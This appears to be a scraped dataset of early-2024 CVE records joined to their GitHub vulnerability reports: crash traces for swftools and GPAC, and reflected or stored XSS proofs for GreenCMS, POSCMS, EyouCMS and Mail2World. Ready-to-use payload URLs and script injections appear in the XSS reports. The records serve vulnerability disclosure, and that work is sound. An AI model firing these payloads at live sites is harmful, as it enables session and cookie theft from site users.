[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/208
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# project https://github.com/matthiaskramm/swftools version:0.9.2 # os info Ubuntu18.04 TLS # poc [poc.zip](https://github.com/matthiaskramm/swftools/files/13783478/poc.zip) # build git clone https://github.com/matthiaskramm/swftools.git cd swftools ./configure --disable-shared && make ./swftools/src/swfc ./poc # ASAN Info ==1870756==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000000528 at pc 0x0000004e8c99 bp 0x7ffe7a318cf0 sp 0x7ffe7a318ce8 READ of size 8 at 0x606000000528 thread T0 #0 0x4e8c98 in removeFromTo /home/ubuntu/swftools/swftools/src/swfc.c:838:22 #1 0x4e8c98 in s_endSWF /home/ubuntu/swftools/swftools/src/swfc.c:1041:8 #2 0x4e8c98 in s_end /home/ubuntu/swftools/swftools/src/swfc.c:2380:13 #3 0x4ff042 in c_end /home/ubuntu/swftools/swftools/src/swfc.c:3769:5 #4 0x4ee709 in parseArgumentsForCommand /home/ubuntu/swftools/swftools/src/swfc.c:4475:5 #5 0x4ee709 in main /home/ubuntu/swftools/swftools/src/swfc.c:458:2 #6 0x7fc943894082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41d63d in _start (/home/ubuntu/swftools/swftools/src/swfc+0x41d63d) 0x606000000528 is located 40 bytes inside of 56-byte region [0x606000000500,0x606000000538) freed by thread T0 here: #0 0x49742d in free (/home/ubuntu/swftools/swftools/src/swfc+0x49742d) #1 0x71941b in rfx_free /home/ubuntu/swftools/swftools/lib/mem.c:13:3 #2 0x4ff042 in c_end /home/ubuntu/swftools/swftools/src/swfc.c:3769:5 #3 0x7fc943894082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x497822 in calloc (/home/ubuntu/swftools/swftools/src/swfc+0x497822) #1 0x719693 in rfx_calloc /home/ubuntu/swftools/swftools/lib/mem.c:69:9 SUMMARY: AddressSanitizer: heap-use-after-free /home/ubuntu/swftools/swftools/src/swfc.c:838:22 in removeFromTo Shadow bytes around the buggy address: 0x0c0c7fff8050: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff8060: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff8070: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0c7fff8080: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff8090: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa =>0x0c0c7fff80a0: fd fd fd fd fd[fd]fd fa fa fa fa fa 00 00 00 00 0x0c0c7fff80b0: 00 00 00 fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff80c0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff80d0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd 0x0c0c7fff80e0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa 0x0c0c7fff80f0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1870756==ABORTING
heap-use-after-free exists in the function removeFromTo in swftools/src/swfc.c:838
https://api.github.com/repos/swftools/swftools/issues/208/comments
0
2023-12-28T05:12:39Z
2024-01-09T01:24:38Z
https://github.com/swftools/swftools/issues/208
2,057,998,005
208
CVE-2024-22957
2024-01-19T18:15:09.093
swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/206" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/206
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# project https://github.com/matthiaskramm/swftools version:0.9.2 # os info Ubuntu18.04 TLS # poc [swfc_crash.zip](https://github.com/matthiaskramm/swftools/files/13815139/swfc_crash.zip) # build git clone https://github.com/matthiaskramm/swftools.git cd swftools ./configure --disable-shared && make ./swftools/src/swfc ./swfc_crash # ASAN Info ==20249==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000016 (pc 0x000000715e78 bp 0x7ffeadf81810 sp 0x7ffeadf817e0 T0) ==20249==The signal is caused by a READ memory access. ==20249==Hint: address points to the zero page. #0 0x715e78 in dict_do_lookup /benchmark/project/swftools/swftools-master/lib/q.c:1190:12 #1 0x4ed867 in dict_lookup /benchmark/project/swftools/swftools-master/lib/q.c:1241:21 #2 0x4ed867 in map_lookup /benchmark/project/swftools/swftools-master/lib/q.c:1463:24 #3 0x4ed867 in lu /benchmark/project/swftools/swftools-master/src/swfc.c:2829:25 #4 0x4ed867 in analyseArgumentsForCommand /benchmark/project/swftools/swftools-master/src/swfc.c:4514:24 #5 0x4ed867 in findFontUsage /benchmark/project/swftools/swftools-master/src/swfc.c:4558:13 #6 0x50ebc5 in firstPass /benchmark/project/swftools/swftools-master/src/swfc.c:4571:5 #7 0x50ebc5 in main /benchmark/project/swftools/swftools-master/src/swfc.c:4590:5 #8 0x7f989e749082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #9 0x41d74d in _start (/box/swfc-ultratest+0x41d74d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /benchmark/project/swftools/swftools-master/lib/q.c:1190:12 in dict_do_lookup ==20249==ABORTING
Out-of-bounds Read swftools/lib/q.c:1190 in dict_do_lookup
https://api.github.com/repos/swftools/swftools/issues/206/comments
0
2023-12-28T04:25:13Z
2024-01-03T02:33:59Z
https://github.com/swftools/swftools/issues/206
2,057,972,921
206
CVE-2024-22749
2024-01-25T16:15:09.010
GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/gpac/gpac/issues/2713" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hanxuer/crashes/blob/main/gapc/01/readme.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3:*:*:*:*:*:*:*", "matchCriteriaId": "58C43523-0CB3-474F-B88B-6ACA538645FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2713
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: https://gpac.io/bug-reporting/ ### Description GPAC v2.3 8684dfb was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 ### The affect version ``` MP4Box - GPAC version 2.3-DEV-revrelease (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - https://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Test environment ``` $ uname -a Linux ubuntu 5.4.0-152-generic #169~18.04.1-Ubuntu SMP Wed Jun 7 22:22:24 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux ``` ### Compiler with asan ``` $ ./configure --enable-sanitizer $ make ``` ### Reproduce ./bin/gcc/MP4Box -dash 10000 ./poc poc link:https://github.com/hanxuer/crashes/raw/main/gapc/01/poc.zip ### Report GDB backtrace: *** buffer overflow detected ***: ../../gpac-asan/bin/gcc/MP4Box terminated #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff20a27f1 in __GI_abort () at abort.c:79 #2 0x00007ffff20eb837 in __libc_message (action=action@entry=(do_abort | do_backtrace), fmt=fmt@entry=0x7ffff2218869 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007ffff2196b5f in __GI___fortify_fail_abort (need_backtrace=need_backtrace@entry=0x1, msg=msg@entry=0x7ffff22187e6 "buffer overflow detected") at fortify_fail.c:33 #4 0x00007ffff2196b81 in __GI___fortify_fail (msg=msg@entry=0x7ffff22187e6 "buffer overflow detected") at fortify_fail.c:44 #5 0x00007ffff2194870 in __GI___chk_fail () at chk_fail.c:28 #6 0x00007ffff2193b02 in __strcpy_chk (dest=dest@entry=0x612000001426 "", src=src@entry=0x7ffffffe2f94 " MPEG-4 AVC|H264 Multiview Video ", destlen=destlen@entry=0x21) at strcpy_chk.c:30 #7 0x00007ffff4682517 in strcpy (__src=0x7ffffffe2f94 " MPEG-4 AVC|H264 Multiview Video ", __dest=0x612000001426 "") at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90 #8 gf_isom_new_generic_sample_description (movie=<optimized out>, trackNumber=<optimized out>, URLname=URLname@entry=0x0, URNname=URNname@entry=0x0, udesc=udesc@entry=0x7ffffffe2f60, outDescriptionIndex=outDescriptionIndex@entry=0x617000011564) at isomedia/isom_write.c:4577 #9 0x00007ffff51556ad in mp4_mux_setup_pid (filter=<optimized out>, pid=0x613000001000, is_true_pid=<optimized out>) at filters/mux_isom.c:3218 #10 0x00007ffff4da6a44 in gf_filter_pid_configure (filter=filter@entry=0x619000014a80, pid=<optimized out>, ctype=ctype@entry=GF_PID_CONF_CONNECT) at filter_core/filter_pid.c:881 #11 0x00007ffff4dadedf in gf_filter_pid_connect_task (task=0x607000000f70) at filter_core/filter_pid.c:1241 #12 0x00007ffff4de4ea1 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000001c10) at filter_core/filter_session.c:2100 #13 0x00007ffff4de8e94 in gf_fs_run (fsess=0x616000001b80) at filter_core/filter_session.c:2400 #14 0x00007ffff47dfe76 in gf_dasher_process (dasher=<optimized out>) at media_tools/dash_segmenter.c:1255 #15 0x00005555555d7622 in do_dash () at mp4box.c:4832 #16 0x00005555555f5bb7 in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6256 #17 0x00007ffff2083c87 in __libc_start_main (main=0x5555555db180 <main>, argc=0x4, argv=0x7fffffffdae8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdad8) at ../csu/libc-start.c:310 #18 0x00005555555db23a in _start () ### Vul in source code: isom_write.c entry->Height = udesc->height; strcpy(entry->compressor_name, udesc->compressor_name); // this entry->color_table_index = -1; Thank you very much for your attention and consideration.
buffer-overflow in gf_isom_new_generic_sample_description function at isomedia/isom_write.c:4577
https://api.github.com/repos/gpac/gpac/issues/2713/comments
1
2024-01-06T06:07:11Z
2024-01-08T10:22:24Z
https://github.com/gpac/gpac/issues/2713
2,068,418,306
2,713
CVE-2024-22570
2024-01-29T20:15:15.420
A stored cross-site scripting (XSS) vulnerability in /install.php?m=install&c=index&a=step3 of GreenCMS v2.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking" ], "url": "https://github.com/Num-Nine/CVE/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:njtech:greencms:2.3:*:*:*:*:*:*:*", "matchCriteriaId": "7271D633-9BD0-4E2B-BA69-E732E3E19D43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Num-Nine/CVE/issues/11
[ "Issue Tracking" ]
github.com
[ "Num-Nine", "CVE" ]
1.Download address: https://codeload.github.com/GreenCMS/GreenCMS/zip/refs/heads/beta 2.Hole location: http://greencms.com/install.php?m=install&c=index&a=step3 3.Fill in the payload at the site name `<script>alert(/xss/)</script>` 4.After the installation is complete, xss can be triggered by visiting the following URL http://greencms.com/index.php?s=/Admin/Login/index Any page in the background can trigger xss
GreenCMS v2.3 exists storage xss
https://api.github.com/repos/QianGeG/CVE/issues/11/comments
0
2023-12-30T08:57:42Z
2023-12-30T08:57:42Z
https://github.com/QianGeG/CVE/issues/11
2,060,685,426
11
CVE-2024-22569
2024-01-31T02:15:54.467
Stored Cross-Site Scripting (XSS) vulnerability in POSCMS v4.6.2, allows attackers to execute arbitrary code via a crafted payload to /index.php?c=install&m=index&step=2&is_install_db=0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Num-Nine/CVE/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:poscms:poscms:4.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "A62614D0-0876-4DEA-BADB-2ADDA028B7FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Num-Nine/CVE/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Num-Nine", "CVE" ]
1.Download address: http://www.poscms.net/xiazai/ 2.Hole location: http://127.0.0.1/index.php? c=install&m=index&step=2&is_install_db=0 3.Fill in the payload at the project name `<script>alert(/xss/)</script>` 4.xss is triggered when you return to the home page after installation ![image](https://github.com/Num-Nine/CVE/assets/137511016/fd47e2cf-46d3-4f4c-8a3e-6a2083198aa9) ![image](https://github.com/Num-Nine/CVE/assets/137511016/f1e14bf7-1cfc-46b6-8219-4d6478af6a6b)
poscms 4.6.2 Storage xss Exists
https://api.github.com/repos/QianGeG/CVE/issues/12/comments
0
2023-12-30T09:06:40Z
2023-12-30T09:08:11Z
https://github.com/QianGeG/CVE/issues/12
2,060,687,596
12
CVE-2024-22927
2024-02-01T23:15:10.960
Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/57" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*", "matchCriteriaId": "C5AE12B9-F8D6-4F10-9B49-50E0263ECA55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/weng-xianhu/eyoucms/issues/57
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
### **Summary** EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form. Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value. These parameters are: `num`,`input`,`path`,`func`,`is_water` ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/2c764b74-2d99-42c7-a339-5d7ee84893bb) _There is no update on github, the latest installation package (V1.6.5) is: https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip_ ### **Details** The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by `<input>` into the page. The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules. ### **POC** HEADER:ALGORITHM & TOKEN TYPE: ``` { "num": "1", "size": "2097152", "input": "", "func": "head_pic_call_back", "path": "allimg", "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>", "alg": "HS256" } ``` **Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.** **In Header, when the `num` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/4f8dc574-c907-4b25-963d-a3ddfe9198be) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/d09bbaf6-c0c4-4b58-9ca9-dcba2f82da58) **In Header, when the `input` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/c3703b1c-5048-4b71-8592-37154f6e6e40) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/54cf66e7-851f-4c9e-ae92-5731771fb786) **In Header, when the `path` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/f823013c-2f1b-4ff7-89d8-d4d087fc4b73) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/8780b450-b4af-47a2-a8b9-ab6325fef35d) **In Header, when the `func` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/b66d332d-d839-4a78-82e1-58b581b6c63f) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/3eac7adb-2bed-4615-bf46-68d64516a357) **In Header, when the `is_water` parameter causes a reflected XSS vulnerability, the payload is:** http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn= ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/fe40e3d7-fab9-4ace-b72c-90748c51be61) ![image](https://github.com/weng-xianhu/eyoucms/assets/66168888/94ab81bc-369d-4f72-876f-02f0c43f398c) ### **Impact** An administrator who is already logged in can have a cookie stolen after accessing the malicious url.
EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities
https://api.github.com/repos/weng-xianhu/eyoucms/issues/57/comments
1
2024-01-05T08:05:47Z
2024-03-22T01:36:04Z
https://github.com/weng-xianhu/eyoucms/issues/57
2,066,903,491
57
CVE-2024-24267
2024-02-05T18:15:52.427
gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": null, "url": "https://github.com/gpac/gpac/commit/d28d9ba45cf4f628a7b2c351849a895e6fcf2234" }, { "source": "[email protected]", "tags": null, "url": "https://github.com/gpac/gpac/issues/2571" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_3.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "81FBED81-2989-4E6D-83CF-BF8E4989F5ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2571
null
github.com
[ "gpac", "gpac" ]
Memory leak in function [gf_fileio_from_mem](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1447) The memory leak is reported by a static analyzer tool developed at CAST (https://www.linkedin.com/company/cast-center). Dynamic memory is allocated [here](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1450) if `gf_fileio_new` fails, function will return from [here](https://github.com/gpac/gpac/blob/941a0891b989f5ad86b739cfb12c84b7e62e8ee4/src/utils/os_file.c#L1455) and allocated memory will remain not freed.
Memory leak in function gf_fileio_from_mem
https://api.github.com/repos/gpac/gpac/issues/2571/comments
0
2023-08-29T11:13:38Z
2023-08-29T13:47:19Z
https://github.com/gpac/gpac/issues/2571
1,871,446,973
2,571
CVE-2024-24130
2024-02-07T14:15:52.720
Mail2World v12 Business Control Center was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Usr parameter at resellercenter/login.asp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Hebing123/cve/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mail2world:mail2world:12:*:*:*:*:*:*:*", "matchCriteriaId": "814F8AA9-4951-4025-A7F3-A434BE630122", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Hebing123/cve/issues/13
[ "Exploit", "Issue Tracking" ]
github.com
[ "Hebing123", "cve" ]
### **Summary** Mail2World V12 Business Control Center has a reflective cross-site vulnerability. ### **Details** A reflective XSS vulnerability exists in the resellercenter/login.asp path of Mail2World v12 Business Control Center. The cause of this XSS vulnerability is that Usr parameters are displayed to the front end without any filtering. ### **Proof of Concept (POC)** https://ip:port/resellercenter/login.asp?Usr=%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E ![image](https://github.com/Hebing123/cve/assets/66168888/3e841dcb-42e7-464c-89cd-07717a5c6d69) ### **Impact** After accessing a malicious url, the visitor's browser executes a malicious script inserted by the attacker.
Mail2World v12 Business Control Center has a reflective XSS vulnerability
https://api.github.com/repos/Hebing123/cve/issues/13/comments
1
2024-01-12T17:37:39Z
2024-03-11T06:20:40Z
https://github.com/Hebing123/cve/issues/13
2,079,360,954
13
CVE-2024-24131
2024-02-07T14:15:52.770
SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.
